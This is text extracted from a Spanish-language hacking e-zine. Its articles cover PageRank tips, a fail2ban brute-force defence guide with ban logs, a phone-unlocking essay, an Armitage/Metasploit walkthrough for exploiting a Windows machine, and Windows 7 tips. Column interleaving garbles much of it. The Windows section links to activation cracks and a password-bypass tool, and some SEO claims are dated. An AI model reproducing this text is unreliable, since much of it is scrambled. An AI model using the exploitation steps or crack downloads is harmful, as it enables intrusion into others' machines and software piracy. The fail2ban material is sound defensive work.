antiguas. Antes a estos estos bots se les llama googlebot y freshbot,
validar vuestras paginas aqu?. De hecho el codigo limpio y ordenado
continuamente en busca de p?ginas nuevas y actualizaciones de el primero indexaba paginas el segundo se encargaba de actualizarlas.
Ahora ya no existen. Parece ser que Google utiliza ya un rango de bots con IP 64.68.82.* que sirven para indexar p?ginas nuevas y tambi?n para meterlas de forma fija en el indice. Una vez que
20
SeNeGe
molan las cosas bien hechas y valorar? la calidad del c?digo). Pod?is no ayuda directamente a subir el Page Rank, pero si que mejora
mucho el posicionamiento de las paginas, osea que es una una manera de aprovechar al maximo nuestro page rank.
2 Que te "Linken" desde p?ginas que tengan un Page Rank alto. Tal y como los enlaces de p?ginas con Page Rank inferior o igual a 3/10
apenas cuentan para aumentar el Page Rank (aunque si cuentan).
Cualquiera con un Page Rank superior o igual a 4/10 har? que sumes muchos puntos en google. (?l es as? de chulo).
3 Indexar tu pagina en DMOZ!!!! important?simo, Dmoz es el
directorio en el que google basa sus b?squedas, una vez a?adido tu Blog all?, pasara a ser un Blog "Oficial". ?No esperes m?s a a?adirlo!
Estos son los 3 puntos mas importantes para mejorar el Page Rank en Google,tambi?n son importantes las metas que le pongas a tu pagina y las palabras clave que uses.
"Entre p?ginas que se enlazan hay mucho trapicheo con esto del page rank, por que claro las p?ginas con el Page Rank mas alto
pueden ayudar mucho a una p?gina nueva por ejemplo. Por eso es importante lograr tener un enlace en esas p?ginas, o en los
directorios donde se adecue la tuya, ya que tambi?n suelen tener un Page Rank importante"
Cuando alguien ponga en Google la palabra "Coche" por ejemplo, Google lo que hace es buscar:
Primero las webs que tengan la palabra en el dominio mismo, osea en la url www.coche.com por ejemplo, o http://www.paginaweb/coche.
Luego las que tengan la palabra coche en su titulo Código:
<Title>Coche</Title>
Y por ultimo aquellas que en el cuerpo de la pagina este escrita la
palabra coche. Y es aqui donde influye el page rank, si es un tio con
un page rank 8/10 el que ha escrito por ejemplo "ayer me compre un
Desde aqu? podeis descargar un pdf en ingles que trata el tema del Pag Rank profundamente. Algunos consejos a recordar para mejorar el Page Rank y el posicionamiento de busqueda.
Tener el codigo de la p?gina y las hojas de estilo validadas es
muy util. En primer lugar por que tener el codigo ordenado, nos
permite trabajar la p?gina y efectuar los cambios de una manera
much mas comoda. Adem?s siempre es un orgullo tener un codigo limpio, como recompensa a un trabajo bien hecho, es como si te pusiesen un 10 haciendo los deberes.
Pero sobre todo tener un codigo validado es importante por que Google lo bonifica con el posicionamiento de busqueda
El que esteis a?adidos en DMOZ. En serio que es super
importante, por que adem?s de mejorar los resultados de vuestra
busqueda, permitira que google os de sirmpre preferencia es como si estuvieseis "registrados" y fueseis sus ni?os bonitos.
A?adir vuestras a directorios y buscadores donde tengan cabida, pues normalmente esos links llegan con un Page Rank alto.
Jugar con las metas en vuestras paginas, a Google le gusta un trabajo bien hecho y explicito, por ejemplo esto seria un buen encabezado, que no el mejor. (Mi p?gina) , aunque google
acostumbra a pasar de todo, son datos que os ayudaran a mejorar el posicionamiento, y ademas sera util para otros buscadores que lleguen a vuestras p?ginas Código:
.<!DOCTYPE html PUBLIC "//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1transitional.dtd">
coche" con ese pedazo page rank va a salir en las primeras busquedas, aunque la palabra coche sea tan comun.
Si es un tio con page rank 3/10, pues en una palabra tan comun
como coche, seguramente aparecer? en las ultimas paginas. Ahi esta el detalle del Page Rank
Una p?gina con un Page Rank bajo, puede aparecer en las primeras posiciones de Google por tener una palabra clave en su url o en su titulo. Pero claro las palabras que podemos meter en un title son
limitadas, lo suyo es que sean las palabras del cuerpo de la pagina las que aparezcan en buenas posiciones, por que esas son las que cuentan, las que se actualizan, y las que son un monton.
De todas las paginas que puedan tener en unenlace a la tuya, para
google cuentan las que tienen Page Rank 4/10 o superior. Las demas tambien cuentan pero su valor es menor, ademas aunque las ve no son tan importantes.
21
Código:
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="esES" lang="esES"> <head>
<title>xxxxx Blog Web personal de xxxxx</title> <meta name="description" content="xxxx" />
<meta name="keywords" content="Bitacora, Blog, Blogs, Weblog, Weblogs, Web Personal" />
<meta name="author" content="xxx xxx xxx" /> <meta name="robots" content="all" />
<meta httpequiv="ContentType" content="text/html; charset=iso 88591" />
<meta httpequiv="ContentLanguage" content="es" /> <meta name="copyright" content="tu nick" /> <meta name="Replyto" content="tu mail" />
<meta name="generator" content="tus herramientas" />
<base href="http://(vuestra url)/" /> Todo esto es un poco pijerio ya lo se, pero es util para google, si
estais interesados en que os trate bien y en aumentar las visitas a vuestras p?ginas, lo tendreis que tener en cuenta. Calculando el Page Rank Dado que el PageRank se traspasa entre p?ginas, mediante enlaces, para calcular (siempre de forma aproximada) el PageRank total de
una p?gina web habr? que saber el PR que recibe de cada uno de los enlaces que apuntan a ella.
Cada documento web tiene la capacidad de repartir el 85% de sus
puntos de PR entre todos los enlaces que contenga. Esto quiere decir que el PR que otorga un enlace se calcula como el PR de la p?gina en cuesti?n, multiplicado por 0.85 y dividido entre el n?mero de
enlaces total que contenga. De forma orientativa, dado que es muy
probable que las puntuaciones hayan variado a lo largo del tiempo, la tabla de correspondencia entre puntos de PR y rangos de PR (de 0 a 10) era la siguiente: C贸digo:
PR1 = 0.00000001 hasta 5 PR2 = 6 hasta 25
PR3 = 25 hasta 125
PR4 = 126 hasta 625
.....
PR10 = 1953126 hasta infinito Por ejemplo una p?gina de PR6 (supongamos 3200 puntos) con 20 enlaces traspasa 136 puntos de PR a cada una de las p?ginas a las que apunta: 3200 x 0.85 / 20 = 136
Muchas veces es m?s beneficioso recibir PR de p?ginas con poca
puntuaci?n pero tambi?n pocos enlaces totales, que de una p?gina de
PR alto y muchos enlaces. Estos datos son utiles, pero son antiguos y no todos los expertos los comparten, aun asi os pueden ayudar a haceros una idea orientativa bastante importante. Fuente: Javi 颅 forobuscadores.com
?Como reconocer a los bots de Google? Si tienes acceso a los "logs" de tu servidor, puedes saber si el
Googlebot ha pasado por tu sitio y lo ha indexado. S?lo tienes que
buscar las ips de los bots. Los bots de google tienen un rango de ips desde 64.68.82.*
Es importante tener en cuenta para que los buscadores trabajen bien, y para que si lo deseais no indexen algunas p?ginas o carpetas
"secretas" que querais tener en vuestro servidor. Debeis crear un
22
archivo llamado robots.txt en cuyo contenido aparezca lo siguiente: # robots.txt for el que lo quiera C贸digo:
User颅agent: *
Disallow: /admin/ # aqui las carpetas que querais que nadie vea Recomendado: http://www.robotstxt.org/
?Habeis visto el robots.txt de google alguna vez? http://www.google.com/robots.txt
FAIL2BAN Como proteger servicios de ataques de fuerza bruta
los dos ultimos fines de semana tuve q sacar intrusos de servidores q
administro, nada peligroso ya q los
equipos estan actualizados y bastante protegidos dentro de lo posible, pero siempre esta el problema de los
usuarios y el cuidado q le dan a sus contraseñas... en
los spammers/scammers estan en la
escala mas baja de la porqueria existente en internet, tanto desde el punto de vista
del usuario q recibe montones de correos
q no le importan como del administrador q trata de hacer todo lo posible para
minimizar el impacto en el buzon del usuario final.
ambos casos se
vieron comprometidas
pero el peligro no esta
cuentas de los
solo en parar la basura
mismos. en la 1era
sino tambien en
lograron entrar x ssh
proteger nuestros
y correr un script q
servers ya q son una
enviaba spam, en la
2da simplemente un login de correo
con el mismo proposito pero enviando una scam tipica, este era el texto:
Please be informed that you have
£100,000 British Pounds Lodged in our Western Union to transfer to you as
winner of ECOWAS Lottery Jackpot. Please Contact:
milton_daniel17@yahoo.com al entrar hizo un par de pruebas
enviandose a direcciones propias q son las siguientes:
kenblast2003@yahoo.com kenblastall@hotmail.com motide7@aol.com
no fue lo suficientemente inteligente para borrar ni siquiera los correos q enviaba, simplemente consiguio la
pass del usuario y me puso en cola 10 millones de correos q se estuvieron
enviando durante unas horas hasta q me di cuenta. creo q penso q siendo
domingo no lo veria hasta el lunes pero x suerte suelo checkear logs bastante seguido.
24
|_ocutus
codiciada presa para
ellos, la oportunidad de hacer unos
cuantos billetes a costa de nuestro buen nombre... je
asi tambien tenemos los miles de script
kiddies q pasan el dia con sus programas de fuerza bruta y sus diccionarios
probando combinaciones de user/pass y
algun ocasional hacker o aprendiz q puede ocasionar algo mas de trabajo. mas de
uno se sorprenderia al ver los logs de un
server publico, al final de la entrada voy a
pastear algunos para q vean el nivel de los ataques...
para detener este tipo de ataques
automatizados existe fail2ban, q es un
software q en base a los logs del sistema puede bannear IPs en base a intentos fallidos de logueo. a pesar de tenerlo
instalado en la mayoria de los servers tuve q ponerlo en TODOS y ajustar la
configuracion para q sea todavia mas
agresiva. de paso aprovecho para hacer esta entrada para q vean q no es nada
dificil de instalar y configurar y ciertamente hace darse x vencido a la mayoria de los intrusos.
instalacion
a pesar de q son muy parecidas voy a explicar la instalacion tanto para
centos/redhat como para debian/ubuntu. para el 1ero tenemos q descargarlo desde:
http://sourceforge.net/projects/fail2ban/ lo extraemos con:
tar xvf fail2banx.x.x.tar.bz2 despues...
cd fail2banx.x.x
python setup.py install
a continuacion lo agregamos al arranque del sistema copiando el siguiente archivo:
cp /files/redhatinitd /etc/init.d/fail2ban chkconfig add fail2ban chkconfig fail2ban on service fail2ban start
en debian/ubuntu lo podemos bajar de los repositorios con:
aptget install fail2ban (sudo en ubuntu) lo siguiente es configurar las "jails" para los servicios q queremos proteger. para
eso vamos a /etc/fail2ban y editamos el archivo jail.conf haciendo una copia de seguridad antes por las dudas...
la configuracion puede variar un poco de una version a otra pero las opciones son mas o menos las mismas siempre. en
debian x ejemplo, las acciones, tiempos de banneo, etc vienen definidas al
principio de manera gral o se pueden personalizar despues en cada jail.
lo primero es setear las redes e IPs seguras, o sea las q queremos q el
sistema no blockee nunca, como el rango de nuestra propia lan o
direcciones de usuarios del sistema. esto se
"actions" con el campo "banaction".
paso a mi) de que el webmail corra en
ejemplo:
en el action de centos vemos dos
otro. en este caso nos vemos obligados
ignoreip = 127.0.0.1 192.168.0.0/24
1era crea una regla de iptables
hace modificando el campo "ignoreip", por
200.53.23.1 10.0.0.0/25
mas abajo tenemos los tiempos y situaciones del blockeo, q podemos dejar como estan o
editarlas como queramos. son las siguientes: bantime: es la cantidad de segundos q una IP es banneada (default 600).
acciones, iptables y sendmail whois. la blockeando la IP y la 2da envia un
correo con un whois de la misma al
destinatario configurado (root en este caso).
vamos a crear alguna jail mas x si no quedo muy claro, postfix en centos:
un server mientras q el MTA esta en
a agregar la IP del 1ero en la lista de
ignoradas del fail2ban del 2do para no bannear a todos los usuarios ya q la direccion de origen del logueo es siempre la misma para todos.
para solucionar esto podemos usar un plugin escrito x matt rude, q se puede descargar desde aca:
http://mattrude.com/projects/roundcube
findtime: un host es banneado si se loguea
[postfixtcpwrapper]
en "maxretry" dentro del "findtime" (default
filter = postfix
hay q copiar el contenido dentro del
(ruta al archivo hosts.deny)
(roundcube/plugins) y despues editar el
erroneamente tantas veces como la cantidad 600seg).
maxretry: es el numero de intentos fallidos antes de ser blockeado.
pasamos ahora a configurar las jails
(carceles). una de las mas usadas es la de ssh asi q empecemos x esa, vamos hasta
"[ssh]" y x default (en debian x lo menos) ya la tenemos activada. sale mas o menos asi: [ssh]
enabled = true port = ssh
filter = sshd
logpath = /var/log/auth.log maxretry = 6
y asi para centos: [sshiptables]
enabled = true filter = sshd
action = iptables[name=SSH, port=ssh, protocol=tcp]
sendmailwhois[name=SSH,
dest=root, sender=fail2ban@fail2ban] logpath = /var/log/secure maxretry = 6
lo q mas nos interesa es q el enabled este en "true" (activada) y el logpath q es la ruta del
enabled = true
action hostsdeny[file=/etc/hosts.deny] = sendmail[name=Postfix,
dest=root]
logpath = /var/log/maillog bantime = 6000 en debian: [postfix]
enabled = true
esta dentro del directorio "config",
agregando en la seccion de plugins la siguiente linea:
$rcmail_config['plugins'] = array('fail2ban');
logpath = /var/log/mail.log
conteniendo solo los intentos fallidos q
filter = postfix
y asi tenemos todo tipo de jails para ftp, http y todos los servicios y la mayoria
llamado userlogins en la carpeta logs usamos para el fail2ban creando una nueva jail:
de los ataques posibles. seria
[roundcube]
explicarlas una a una, simplemente
port = http,https
interminable y no tendria mucho sentido experimentando un poco se pueden activar bastante facil. roundcube
roundcube es un cliente de webmail
relativamente nuevo (todavia esta en
enabled = true
filter = roundcube logpath =
/pathderouncube/logs/userlogins el eterno punto debil
beta) con muchisimas opciones y una
obviamente esto no nos deja 100% a
ninguna otra. en mi humilde opinion es
formas nunca es bueno confiarnos
interfaz q no tiene nada q envidiarle a muy superior al eterno squirrelmail q parece casi prehistorico al darle una mirada a uno y el otro.
debian vemos q falta el campo "action", eso
q usemos como vimos antes, pero
25
contenido del archivo main.inc.php q
con esto se crea un nuevo archivo
los logueos de correo pueden ser
es xq viene definido antes en la seccion
directorio de plugins de roundcube
port = smtp,ssmtp
log de seguridad del sistema, esta cambia de un sistema a otro como se puede ver. en
fail2banplugin/
blockeados con la jail "postfix" o el MTA tambien se puede dar el caso (como me
salvo pero ayuda bastante, de todas demasiado y mantener siempre los
sistemas actualizados, los permisos
bien configurados y los usuarios con las passwords mas complejas posibles... aunque siempre seran usuarios y
siempre cabe la posibilidad de q hagan click donde no deben entregando sus
datos ante cualquier loteria de turquia o
una herencia del principe de liechtenstein... ... ese es el verdadero punto debil. apendix
como habia prometido copio unas horas del log de fail2ban en un servidor de correo publico (no muy grande) para q vean la cantidad de conexiones blockeadas. la mayoria son de postfix pero hay alguna de ssh.
20120524 04:02:41,098 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.49.25.205 20120524 04:14:01,114 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.224.163.183
20120524 04:52:59,128 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 186.105.151.68
20120524 05:01:16,142 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 90.170.212.117
20120524 05:01:32,156 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.172.162.35
20120524 05:31:24,170 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 188.138.115.237
20120524 05:54:26,188 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 181.1.142.88 20120524 05:56:43,202 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.139.154.117
20120524 06:04:14,217 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 181.14.149.157
20120524 06:42:19,230 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.16.233.253
20120524 06:47:21,242 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 189.45.204.138
20120524 06:54:42,259 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 41.79.176.10
20120524 07:13:24,273 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 181.14.133.18 20120524 07:14:32,287 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 168.226.249.18
20120524 07:18:01,301 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 168.226.165.193
20120524 07:19:59,315 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 181.14.130.174
20120524 07:28:02,330 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.31.98.41 20120524 08:02:34,618 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 181.14.150.101
20120524 08:03:04,633 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.139.223.41
20120524 08:16:23,647 fail2ban.actions: WARNING
26
SERVICIO E-ZINE Hola amigos en esta ocasión les traigo una pequeña investigación de las personas que reparan nuestros teléfonos celulares. ¿Porque sobre ellos?
Por que como hoy en día la mayoría de
nosotros andamos un teléfono celular y a uno que otro de nosotros se nos ha estropeado, queremos liberarlo,
desbloquearlo, o simplemente queremos actualizarlo.
Ahora veremos un proceso de cómo es que se libera un teléfono Sony Ericsson E15 (Xperia X8).
Con herramientas profesionales y usadas
Después de tener las herramientas
necesarias, comenzamos con el proceso de liberación para nuestro teléfono.
Conectamos nuestro teléfono a la Box con
por un profesional.
En este caso usaremos una herramienta que se llama Medusa Box, cable de servicio para el modelo antes mencionado y su respectivo software.
nuestro cable de servicio.
Lo conectamos con el software y le
damos clic en la opción que nos dice “Unlock” esperamos que termine el proceso y listo teléfono liberado.
Después de tener las herramientas necesarias, comenzamos con el proceso
28
nomo11
Desconectamos y a disfrutar nuestro teléfono con cualquier compañía.
¿Muy sencillo no? ¿Crees que tú lo puedes hacer solo adquiriendo las herramientas? ¿Crees que no hay más detrás del proceso?
Bueno amigos perdón por expresarme así pero la verdad hay muchas personas que no les parece el precio por el servicio que se les da y piensan que aunque se vea fácil y sencillo de hacer, es muy complicado, porque podemos adquirir cualquier herramienta para poder hacerlo nosotros mismos, pero si no sabemos cómo usar el software, cómo usar el cable, qué hacer cuando estemos haciendo todos los pasos bien y el software nos marque algún error desconocido, eso es por eso que se cobra el servicio y aunque hay veces no nos parezca el precio, las personas que lo hacen son profesionales e invierten en su conocimiento y
29
herramientas. Ya ahí viene el dicho: “Se cobra por lo que se sabe, no por lo que se hace” “Precio de tornillo a cambiar $ 10 pesos, saber que tornillo cambiar $ 100 pesos” ¿Quieres un servicio exprés? Hay muchas personas que quieren un servicio súper exprés, o por lo menos lo quieren en menos de 30 si no su servicio lo quieren gratis. En algunas ocasiones, se les otorga un servicio exprés, pero también depende el modelo de teléfono, aunque hay veces nos parezca increíble, un teléfono sencillo o muy básico nos puede llegar a costar más caro liberarlo que lo que nos costo y puede tardar hasta 2 o 3 días en liberarlo. ¿Por qué? Por que el nivel de seguridad es muy alto o nuevo que todavía no hay dicha herramienta y sale muy caro el código de liberación. También, es el mismo caso con las reparaciones físicas, ya que puede ser que el fabricante sea muy elevado el costo de fabricación del producto y también es por eso que hay veces que la refacción nos sale también más caro que el teléfono. Bueno amigos ahora ya tienen un idea de cuándo llevemos nuestro teléfono a servicio técnico y no andemos con berrinches por qué no nos parece el trabajo que nos van a realizar.
armitage
Primero que nada bienvenidos a esta
Entrando a un equipo
pondré la ip local, ahora si tu maquina es
parte del articulo de la ezine en esta
local pero son muchas maquinas y no
parte veremos armitage que es una
sabes ¿Cuál esta encendida? ¿Cuál tiene
herramienta grafica para poder usar
una vulnerabilidad? Puedes hacer otro tipo
metasploit.
Para utilizar armitage tenemos que
Aca si te sale esa ventana le
Le doy en OK
Puedes visitar su pagina oficial que
Por ultimo termina el escaneo ahora me
contiene mucha información necesaria:
dice que use buscar ataques… para poder
http://www.fastandeasyhacking.com
Windows,Linux y mac, en este caso utilizaremos backtrack que en este
mismo articulo puedes ver como se instala.
y escanea todas las maquinas en red en pcs…
actualizado, y armitage…
ah! Por cierto, armitage lo puedes usar
de escaneo 192.168.x.x/24 le agregas el 24 este caso la ip seria desde el modem y las
tener por lo menos java, metasploit
Bueno empecemos abriendo armitage ,
host, en mi caso como la maquina es local
das en YES
Luego empezara a realizar su coneccion…. Ya luego estará listo armitage…
Ahora lo primero que hacemos siempre para poder identificar una maquina vulnerables es hacerle footprinting o recolección de
datos sobre la maquina o victima, en este
caso analizaremos sus puertos aver cual es vulnerable e intentaremos acceder, aaah!
Otra cosa es que no solo acepta escaneos de nmap son también de:
Acunetix, nessus,openvas,retina y otros mas pero puse los que conozco por que son
explotar…
Una cosa importante es que tengo
habilitado el firewall de mi pc, muchas
veces se lo puede brincar el firewall hay
muchos métodos para poder hacerlo, pero este tema no lo tocaremos…
Entonces tenemos un Windows :P que no sabemos todavía si es vulnerable, asi que
Abrimos el armitage….
buscamos los ataques..
famosos en internet xD!
Host>Nmap Scan>Intense Scan
Como ves allí tenemos para escanear con
nmap en este caso los puertos un escaneo
poner tu ip publica o tu ip privada, en port
el puerto que quieras y user y pass lo mismo
es un ejemplo practico lo veremos asi… le damos en connect…
30 arthusu
Lo siguiente solo seleccionamos el host en parte de attack buscamos un posible
coneccion, por ejemplo en host puedes
configurado asi, pero en este ejemplo como
Dice que el análisis de ataque se completo esta caso un windows clic derecho y en la
Aquí puedes configurar el armitage para la
lo que tu quieras no es necesario tenerlo
Nos tirara un mensaje como el siguiente:
intenso:P
Luego te pide la ip a escanear puedes hacer un simple ping para conseguir la ip de un
ataque que pueda funcionar :D
Asi que intentaremos ese ataque… Aquí nos sale lo que podemos configurar…
Esto significa que esta lanzando los exploits probando cual funciona.
LHOST = local host nuestr ip local
LPORT = local port al que estaremos escuchando o conectando
RHOST = ip publica o local de la victima seria xD
RPORT = el puerto a atacar
Targets = es el tipo de sistema operativo
Tambien podemos habilitar la opción
use a reverse conection que puede ser muy interesante.
Ahora si la maquina no es vulnerable te saldrá No
daremos en Launch
vulnerable por que le meto a cada rato los parches
Por ultimo para lanzar el exploit le Ahora si el ataque no es exitoso como
esperabas puedes intentar mas exploits o puedes intentar usar la opción de
autpwn de metasploit que va probando
acitve sessions. En mi caso mi maquina no es nuevos que van saliendo y tengo el sistema
actualizado aunque sea XP XD!, ahora si lo
intentamos con una maquina vulnerable que pasa…
exxploits y configurándolos
automáticamente hasta ver si la
maquina es vulnerable… para ello
haremos:
Y saldrá:
Y listo una maquina en tu posición sistema operativo Linux :D Saludos a todos! Dhackers por siempre Arthusu 2012
31
Trucos Windows 7 Desde que hay windows siempre tenemos
para volver adescargar de nuevo es muy
toca a Windows 7 el sistema operativo mas
copia de seguridd de una manera muy
formas de hacer diferentes trucos, ahora le
usadoo y actual en este momento, vamos a mostrar algunos truquitos para mejorar la
tedioso entonces hay forma de hacer una facil:
finalidad y saber mas a serca de este OS.
Primero vamos a bontón de inicio de
1 Cual es el mejor antivirus para
cuadro de búsqueda:
Windows 7?
Pues hay muchos pero personalmente
recomiendo, Avast Antivirus Home Edition Y AVG antivirus Free.
2 Como Bloquear la sesión de Windows 7 desde un icono partiendo del escritorio.
Para esto lo que vamos a hacer es; crear un icono de acceso directo al bloqueo del ordenador hacemos los siguiente:
Clic con el botón derecho del ratón en el escritorio y seleccionamos "nuevo".
Luego Seleccionamos "acceso directo". proseguimos a que nos pedirá de introducir un campo de texto y escribimos esto :
rundll32.exe user32.dll,LockWorkStation
Windows y escribimos lo siguiente en el C:\Users\Username\AppData\Local\Micros oft
Cambia "C" por la unidad en la que tengas instalado tu Windows 7 y "username" por el usuario que tengas para iniciar sesion.
4 optimizar el rendimiento de Windows7 con discos SSD
Hoy en dia Windows 7 tiene preparado
para detectar la instalación de discos SSD,
tras lo cual, automáticamente deshabilita la defragmentación, pero es bueno asegurarse de ello, por lo que vamos a panel de
control, herramientas administrativas y
luego a Servicios, ahí buscamos el servicio Defragmentador de Disco y lo deshabilitamos (sigue).
entonces le damos a siguiente e
El uso de discos SSD acelera los tiempos
por ejemplo : bloquear PC
lo que la opción de hibernación pierde
introducimos el nombre del acceso directo,
Y listo solo finalizamos y ya tenemos el
icono para bloquear el ordenador con un simple doble clic encima.
Tambien podemos dejar el icono en el
escritorio o anclarlo a la barra de tareas con lo que simplemente pincharemos una vez con el ratón en el y la máquina bloqueará la sesión.
3 ‐ Hacer copia de seguridad de nuestros gadgets de Windows 7
Es importanter siempre que tenemos
muchos gadgets y no queremos perderlos
32 IPepe
de encendido y apagado del ordenador por sentido.
Teniendo claro que no usaremos el modo
de hibernación, deshabilitándolo te librarás del archivo hiberfil.sys, el cual ocupa, en mi caso 2,3 Gb y está en la raiz de la
unidad donde tenemos instalado Windows
7. Para ver este archivo de sistema tendrás
que ir a las opciones de carpeta y búsqueda y elegir "ver archivos y carpetas ocultos". Para deshabilitar la hibernación iremos a
Inicio, escribiremos CMD, pulsaremos Enter y en la ventana negra de DOS
escribiremos powercfg –h off y con ello la hibernación quedará deshabilitada y te librarás de ese pesado archivo.
5 Instalar Windows 7 con todos los pasos explicados
LA INSTALACION! 1. Introducir el DVD de Windows 7 2. Nos aparecerá un texto como el
siguiente “Presione cualquier tecla para arrancar desde el CD o DVD”, presionamos cualquier tecla
3. Finalmente veremos la pantalla de
presentación de Windows 7, en donde nos preguntaran el idioma y demás opciones. Seleccionamos el español y luego
terminamos de configurar la hora y el teclado
4. Hacemos clic en el botón “Instalar Ahora”.
5. A continuación deberás leer el contrato
de licencia de Microsoft para luego aceptar los términos de licencia. Por ultimo debes hacer clic en Siguiente.
6. En la siguiente pantalla tendrás dos
opciones, la de actualizar el (Upgrade) y la de la instalación personalizada (custom). Hacemos clic en Personalizada.
7. Seleccionaremos cualquier partición que tengamos disponible y haremos clic en
instalar. SI no tenemos formateado el disco rígido, tendremos que hacer clic en
“Formatear” para dejar sin archivos a esa partición.
8. Cuando hayas formateado la partición, te ubicaras donde quieres instalar el Windows 7 y le das clic en siguiente.
9 Una vez terminado el copiado de
archivos, escribirás un nombre de usuario y nombre de equipo si tu quieres. Click en siguiente
10.En la siguiente pantalla nos preguntaran una contraseña, la cual obviamente será opcional y personal. Puedes dejar en
blanco estos campos si tu lo deseas. Clic en
siguiente.
11. En esta ventana ingresaras el numero de serie Windows 7, por ultimo le haces clic en siguiente
12. En la siguiente pantalla seleccionamos
Descarga de la herramienta:
1. diskpart
6f1b46e45f2c331cf72baadcb21e/Hack_7_si
3. select disk 2 (hay que
http://shareflare.net/download/87780.87e69 npass.rar.html
“Usar la configuración recomendada”
13. Configuras tu zona horaria dependiendo donde te encuentres.
14. En este paso deberes elegir la ubicación del equipo; Casa (red domestica), Trabajo (red de trabajo), Cyber o demás (Red Publica).
Finalmente has terminado con la instalación de Windows 7.
6 Herramientas seleccionadas para tunear tu Windows 7
Para ver el video:
http://www.youtube.com/watch?feature=pla yer_embedded&v=Xac8kl_RZJQ 7 Como activar tu Windows 7 Con la heramienta Windows 7 OEM Key Ahora esta herramienta dispone de
actualización de las Claves de producto y de los Certificados.
Descarga: http://hotfile.com/dl/122904513/81751d8/
Windows_7_OEM_Key_3.29.06.2011.exe. html
http://www.fileserve.com/file/cdsfaqM https://rapidshare.com/files/891213057/Win dows_7_OEM_Key_3.29.06.2011.exe
8 Crackear Windows 7 para toda la vida:
Ahora podemos Crackear windows 7
(32/64) para toda la vida, Solo abrir luego ejecutar la aplicación, darle a intalls,
esperar, darle a ok y se reinicia el pc, una
vez iniciado windows, ya tienes windows 7 original de por vida.
33
9 Instalar Windows 7 desde una llave USB
No es dificil lo único que tendremos que tener en cuenta es el hecho de que será
necesario contar con una llave de memoria USB con la suficiente capacidad. La
imagen ISO del DVD de Windows 7 Beta
2. list disk
reemplazar el 2 con el número de disco en el que se detecte nuestra unidad USB) 4. clean
5. create partition primary 6. active
7. format fs=fat32 quick 8. assign
9. exit creamos la partición de arranque en la llave USB
debe ser descomprimida en un directorio
Con la imagen ISO de Windows 7 Beta en
lo que necesitaremos 4 Gbytes de capacidad
anteriormente en el disco duro,
dentro de la unidad de almacenamiento, por como mínimo. Lo siguiente que tenemos que hacer es comprobar que la BIOS del ordenador donde vayamos a realizar la
instalación es compatible con el arranque
desde una unidad USB. Lo cierto es que es lo más probable si el PC cumple con los
requisitos mínimos para instalar Windows 7.
Ahora vamos a preparar la llave para
empezar tendremos que preparar la llave USB, dándole el formato correcto y
activando la partición que crearemos para
almacenar luego los contenidos del DVD .
Para ello abrimos una consola de comandos escribiendo command en la opción ejecutar
del menú inicio y escribiremo uno detrás de otro los siguientes comandos seguidos cada uno de la tecla enter:
32 o 64 bits que hemos guardado
simplemente tendremos que hacernos con un programa capaz de extraer todos los
ficheros de esa imagen ISO. Uno de los más populares y recomendados es MagicISO.
finalmente tendremos que elegir la imagen del disco de instalación de
Windows 7 y descomprimir todos sus archivos a la llave USB. Luego
simplemente introduciremos la llave USB en el ordenador donde queramos instalar Windows 7, estableceremos en la BIOS que arranque desde USB y daremos comienzo a la instalación.
Conociendo mi PC
¿Qué es el Hardware?
Software de aplicación:
El hardware se refiere a todos los
cabo una o varias tareas específicas, en
componentes físicos de las computadoras, como lo
son el disco dura, la grabadora de DVD, la placa madre, el microprocesador, etc
Aquel que permite a los usuarios llevar a cualquier campo de actividad susceptible de ser automatizado o asistido, con especial énfasis en los negocios. Incluye entre otros:
Software
Aplicaciones de Sistema de control y
El software es una secuencia de
_ Aplicaciones ofimáticas
instrucciones, las cuales le dicen a los compones físicos
cómo deben realizar una tarea en particular.
Que es un Software de sistema:
automatización industrial .. _ Software educativo _ Software médico
Ni más ni menos que la Unidad Central
_ Software de Diseño Asistido (CAD)
centro de operaciones de cualquier
_ Software de Cálculo Numérico
_ Software de Control Numérico (CAM)
Su objetivo es desvincular adecuadamente
Datos e Información
de la computadora en particular que se
En informática decimos que lo que
procesamiento referido a las características
los mismos son procesados y luego los
al usuario y al programador de los detalles use, aislándolo especialmente del
internas de: memoria, discos, puertos y dispositivos de comunicaciones,
impresoras, pantallas, teclados, etc. El
software de sistema le procura al usuario y
ingresamos a la computadora son datos, resultados obtenidos de los datos de
entrada los denominaremos información (es decir los datos ya procesados).
programador adecuadas interfaces de alto
Vamos a un ejemplo: Supongamos que
que permiten su mantenimiento.
números (2+2) con la calculadora que trae
nivel, herramientas y utilidades de apoyo
deseamos realizar una suma de dos
el sistema operativo windows, decimos
Software de programación:
entonces que ingresamos datos ( 2+2) por
Es el conjunto de herramientas que
el botón con el símbolo = para que nos
permiten al programador desarrollar
programas informáticos, usando diferentes alternativas y lenguajes de programación, de una manera práctica. Incluye entre otros:
del Sistema (System Unit en inglés) es el computadora.
Al abrir dicha unidad central del sistema (también denominado gabinete, chasis o
carcasa se pueden visualizar un conjunto de componentes:
Nos encontramos con componentes como:
CPU o Unidad central de proceso Placa madre o motherboard Memoria principal
Fuente de alimentación Los buses
Disco duro
Unidad central de proceso:
medio del teclado, los que al presionar en
devuelva el resultado serán procesados por el microprocesador y éste nos responderá en el monitor el resultado que lo
La unidad central
el número 4).
los usuarios representa al gabinete o
denominaremos información (es este caso
_ Editores de texto
La presentación de datos seria a si: Las PC
_ Intérpretes
base del sistema de numeraciónb binaria
_ Compiladores
Unidad central del sistema
o computadoras personales trabajan con la (números 0 y 1).
